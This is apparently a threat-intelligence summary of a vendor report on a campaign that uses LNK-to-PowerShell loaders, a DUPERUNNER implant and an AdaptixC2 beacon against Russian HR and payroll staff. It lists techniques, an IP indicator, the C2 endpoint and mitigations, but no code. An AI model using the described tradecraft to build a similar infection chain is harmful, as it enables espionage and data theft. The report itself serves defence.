Full Report
Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection. IOCs MITRE ATT&CK. Introduction SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […] The post Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2 appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Analysis Summary
# Threat Actor: UNG0902 (Implied)
## Attribution & Identity
The threat campaign described, "Operation DupeHike," is attributed to the threat actor group **UNG0902** by the SEQRITE APT-Team (though the article focuses heavily on the technical execution rather than definitive attribution linking to historical UNG0902 activity outside of naming the campaign).
## Activity Summary
SEQRITE uncovered a recent campaign targeting Russian corporate entities. The stated objective appears to be espionage or data theft, leveraging highly realistic lures related to internal HR and payroll matters (employee bonuses, financial policies) delivered via spear-phishing.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via malicious ZIP archives containing decoy documents and malicious LNK files.
- **Execution (Initial Stage):** Use of a malicious Shortcut (.LNK file) to execute PowerShell (`powershell.exe`) to download the subsequent stages.
- **Defense Evasion/Masquerading:**
- LNK file masquerading as a PDF (`Документ_1_О_размере_годовой_премии.pdf.lnk`).
- Using a WOFF file intended to look like a font file (`fontawesome.woff`).
- AdaptixC2 using packed shellcode appended behind specific magic bytes ("EZ").
- Dynamic API resolution within AdaptixC2 using djb2-style hashing and PEB traversal.
- **Implantation/Persistence:** DUPERUNNER implant is used for code injection.
- **Process Injection:** DUPERUNNER injects AdaptixC2 shellcode into legitimate processes such as `explorer.exe`, `notepad.exe`, and `msedge.exe` using Remote Thread Injection (T1055.003, T1055).
- **Loading:** Reflective Code Loading is used by AdaptixC2 to load its payload from appended shellcode (T1620).
- **Discovery:** System Information Discovery (hostname, domain, time, Temp directory) and Process Discovery (T1057, T1082).
- **C2 Communications:** Uses HTTP Application Layer Protocol (T1071.001), employing data encoding (T1132) and encryption (T1573). May use raw TCP (T1095).
- **Exfiltration:** Data Exfiltration (T1537) over the C2 channel (T1041), sending encoded results to the `/result` endpoint via POST.
**MITRE ATT&CK Mappings Observed:** T1036, T1027, T1027.007, T1055.003, T1620, T1082, T1057, T1071.001, T1132, T1095, T1573, T1055, T1113/T1005, T1041, T1537.
## Targeting
- **Sectors:** Corporate Sector, specifically Human Resources & Payroll departments.
- **Geography:** Russian Federation.
- **Victims:** Russian corporate entities (specific organizations not named in the provided text, but the focus is internal administrative functions).
- **Lure Context:** Decoy documents centered on simulating official internal HR procedures for annual bonuses, salary payments, and internal financial policies.
## Tools & Infrastructure
- **Malware Families Used:**
- **DUPERUNNER:** The initial implant, tracked by SEQRITE, downloaded via PowerShell used for process injection.
- **AdaptixC2 Beacon:** The final-stage beacon loaded by DUPERUNNER for command and control.
- **Infrastructure:**
- Initial download source IP address identified: `46.149.71.230` (Used for downloading decoy and beacon via HTTP GET).
- C2 endpoint path: `/result` (Used for exfiltration POST requests).
## Implications
The actor demonstrates a high degree of tradecraft, utilizing multi-stage infection chains, custom malware (DUPERUNNER, AdaptixC2), and heavy obfuscation/process injection techniques to maintain persistence and evade detection while targeting sensitive internal corporate functions in Russia. The use of highly relevant HR/payroll lures suggests a targeted espionage or data theft mission focused on gaining insider-level access.
## Mitigations
- Implement robust email gateway filtering to block malicious ZIP/LNK file extensions if possible, or scan archived content rigorously.
- Monitor for unusual execution of `powershell.exe` downloading external content, especially involving `-WebRequest`.
- Deploy Endpoint Detection and Response (EDR) solutions capable of detecting process injection techniques (T1055) and reflective loading (T1620) into legitimate processes like `explorer.exe`.
- Profile network traffic for connections to known suspicious IPs and look for suspicious HTTP GET/POST requests associated with C2 communication patterns.
- Enhance monitoring of internal administrative systems, especially HR and payroll databases, for anomalous file access or data exfiltration attempts.